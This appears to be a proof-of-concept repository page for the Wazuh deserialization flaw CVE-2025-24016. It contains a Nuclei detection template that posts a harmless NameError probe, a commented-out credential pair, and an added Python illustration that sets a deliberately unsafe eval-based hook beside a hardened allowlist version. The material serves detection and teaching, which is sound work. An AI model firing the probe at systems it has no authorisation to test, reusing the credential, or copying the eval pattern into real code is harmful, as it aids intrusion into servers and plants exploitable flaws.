
CVE-2025-24016 PoC — Remote code execution in Wazuh server

Associated Vulnerability
Title: Remote code execution in Wazuh server (CVE-2025-24016)
Description: Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix.
Readme
# CVE-2025-24016 Wazuh Unsafe Deserialization RCE Detection

This repository contains a Nuclei template to detect the unsafe deserialization vulnerability in Wazuh servers, identified as **CVE-2025-24016**.

## Template Details

```yaml
id: wazuh-unsafe-deserialization
info:
  name: "Wazuh Unsafe Deserialization RCE Detection"
  author: "Hüseyin TINTAŞ"
  severity: critical
  description: |
    This template detects an unsafe deserialization vulnerability in Wazuh servers.
    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class
    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the
    payload reached the vulnerable deserialization function.
  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
  reference:
    - https://documentation.wazuh.com/
requests:
  - method: POST
    path:
      - "{{BaseURL}}/security/user/authenticate/run_as"
    headers:
      Content-Type: application/json
      # If needed, uncomment the following line for authentication. The Nuclei base64() helper
      # encodes the credential "wazuh-wui:MyS3cr37P450r.*-" at run time, so the header value
      # cannot drift from the credential written next to it.
      # Authorization: 'Basic {{base64("wazuh-wui:MyS3cr37P450r.*-")}}'
    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
    # Both matchers must hit: without "and", Nuclei ORs the matchers by default and any
    # HTTP 500 (unrelated server errors included) would be reported as vulnerable.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "NameError"
```
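To show why the template's NameError probe is a meaningful signal, here is an added illustration, not Wazuh's code and not part of this repository, of the deserialization pattern the advisory and the template description refer to, next to an allowlist-based hardened version. The hook names, `ALLOWED_EXCEPTIONS`, `deserialize` and both sample payloads are constructed for this example.

```python
import json

# Constructed, simplified model of the pattern the advisory describes: a JSON
# object hook that turns {"__unhandled_exc__": {"__class__": ..., "__args__": ...}}
# back into an exception object. This is NOT Wazuh's as_wazuh_object, only a
# stand-in that shows why an attacker-chosen "__class__" string is dangerous.
def unsafe_object_hook(dct):
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        # eval() resolves an arbitrary Python expression, not just a class name
        return eval(exc["__class__"])(*exc["__args__"])
    return dct

# Hardened form (illustrative, not the upstream 4.9.1 patch): map the name
# through a fixed allowlist of exception types and never evaluate input.
ALLOWED_EXCEPTIONS = {
    "ValueError": ValueError,
    "KeyError": KeyError,
    "TimeoutError": TimeoutError,
}

def safe_object_hook(dct):
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        if not isinstance(exc, dict):
            raise ValueError("malformed __unhandled_exc__ entry")
        cls = ALLOWED_EXCEPTIONS.get(exc.get("__class__"))
        args = exc.get("__args__", [])
        if cls is None or not isinstance(args, list):
            raise ValueError("refusing to deserialize unknown exception type")
        return cls(*args)
    return dct

def deserialize(payload, hook):
    """Return the decoded object, or the name of the exception the hook raised."""
    try:
        return json.loads(payload, object_hook=hook)
    except Exception as e:
        return type(e).__name__

# Constructed inputs. PROBE mirrors the Nuclei template body: a class name that
# does not exist, so the vulnerable hook raises NameError and runs nothing else.
PROBE = '{"__unhandled_exc__": {"__class__": "NotARealClass", "__args__": []}}'
BENIGN = '{"__unhandled_exc__": {"__class__": "ValueError", "__args__": ["boom"]}}'

if __name__ == "__main__":
    print(deserialize(PROBE, unsafe_object_hook))        # NameError
    print(deserialize(PROBE, safe_object_hook))          # ValueError (rejected)
    print(repr(deserialize(BENIGN, safe_object_hook)))   # ValueError('boom')
```

The same NameError that surfaces here is what the template looks for in the HTTP 500 body; the hardened hook turns the probe into a plain input-validation error and still round-trips legitimate exception objects.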

## Usage

```bash
nuclei -t CVE-2025-24016.yaml -u http://example.com
```

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
File Snapshot

```
[4.0K] /data/pocs/c4d655b54017657fc1205124fb7ca047d8a29c91
├── [1.3K] CVE-2025-24016.yaml
└── [1.8K] README.md

0 directories, 2 files
```